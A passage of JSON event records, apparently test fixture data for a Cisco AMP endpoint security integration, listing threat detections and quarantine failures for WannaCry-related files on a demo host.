Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":884000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":541000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 